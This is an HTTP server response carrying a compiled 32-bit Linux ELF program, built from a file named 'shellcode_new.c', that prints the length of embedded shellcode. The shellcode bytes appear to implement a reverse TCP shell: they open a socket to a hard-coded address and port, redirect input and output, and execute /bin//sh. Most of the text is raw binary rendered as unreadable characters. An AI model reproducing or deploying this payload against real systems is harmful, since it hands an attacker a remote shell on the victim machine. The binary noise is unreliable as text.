HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.3
Date: Mon, 25 Mar 2019 18:59:04 GMT
Content-type: application/octet-stream
Content-Length: 7413
Last-Modified: Mon, 25 Mar 2019 18:56:02 GMT

.ELF....................P...4...........4. .	.(.........4...4...4... ... ...............T...T...T....................................................................... ...............................................h...h...h...D...D...........P.td............4...4...........Q.td............................R.td............................/lib/ld-linux.so.2..............GNU.............................GNU......S..dN|@^R..K.................... . .........K..................)........................... ...0...............7...................t............__gmon_start__.libc.so.6._IO_stdin_used.printf.strlen.__libc_start_main.GLIBC_2.0...............................ii
....I...............................................S........[..#...........t..-......[..........5.....%.........%....h..........%....h..........%....h..........%....h.........1.^.....PTRhP...h....QVh<.........f.f.f.f.f.f.f..'...-$......w..........t.U.......$$.........t&..$...-$...............u..........t.U......D$...$$..........&.....=$....u.U......|.....$.......f........t........t.U.......$........y....t...U..WVS.....`.D$.......F..........t...
f......................................t...4
f.4.........t....
....D$...$......D$...$x....P....D$..D$\.D$\...e.[^_].f.f.f.f.f.UWVS.i.............l$0.................)......t)1........D$8.,$.D$..D$4.D$...........9.u....[^_]..
.................$.f.S........[.........[............
Shellcode 1 Length:  %d
...1.SCSj...jfX...Y.?..Iy.h....fh".fj....fPQS......Rh//shh/bin..RS............;0.......$...L...`...p...........t.......v................zR..|.......... ...........P......F..J..t.x.?.;*2$"(...@............A....B
.I.........A.A.A....8...l...`...a....A....A....A....A....N.0.J..A...A...A...A...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
...X......................................o........,...........
...S............................... ..............................................o.......o.......o........................................................................&...6...F...........GCC: (Ubuntu/Linaro 4.7.2-2ubuntu1) 4.7.2.GCC: (Ubuntu/Linaro 4.6.3-10ubuntu1) 4.6.3 20120918 (prerelease)...symtab..strtab..shstrtab..interp..note.ABI-tag..note.gnu.build-id..gnu.hash..dynsym..dynstr..gnu.version..gnu.version_r..rel.dyn..rel.plt..init..text..fini..rodata..eh_frame_hdr..eh_frame..init_array..fini_array..jcr..dynamic..got..got.plt..data..bss..comment........................................................T...T.......................#...........h...h... ...................1...................$...................D......o............ ...................N...................`...................V...........,...,...S...................^......o................................k......o............ ...................z...	.......................................	............... .......................................$.......................................P...............................P...P...................................X...X...................................p...p...j.......................................4...............................................................................................................................................................................................................................................................................................................................................................$...$...............................0.......$...k...........................................................................H...@.......-...........	...................m.......................................T...............h...............................................................,.........................................................	...............
.....................................P.........
.....X...............p...............................................................................................................................................................$.........................................................................
...............
.A.............
.W...$...........f.............................
.................................................................................................................................................................%...P.........
.5...R.........
.L........... ...h........... ...s...................$...............X....................................... ....... ...............t...................................................a.....
.	...(...............P.........
.....p...............$...........(...<.........
.-........... ...A...$...........M........... ...g................crtstuff.c.__JCR_LIST__.deregister_tm_clones.register_tm_clones.__do_global_dtors_aux.completed.6382.__do_global_dtors_aux_fini_array_entry.frame_dummy.__frame_dummy_init_array_entry.shellcode_new.c.__FRAME_END__.__JCR_END__.__init_array_end._DYNAMIC.__init_array_start._GLOBAL_OFFSET_TABLE_.__libc_csu_fini.__i686.get_pc_thunk.bx._ITM_deregisterTMCloneTable.data_start.printf@@GLIBC_2.0._edata._fini.__data_start.__gmon_start__.__dso_handle._IO_stdin_used.strlen@@GLIBC_2.0.__libc_start_main@@GLIBC_2.0.__libc_csu_init._end._start._fp_hw.__bss_start.main._Jv_RegisterClasses.__TMC_END__._ITM_registerTMCloneTable._init.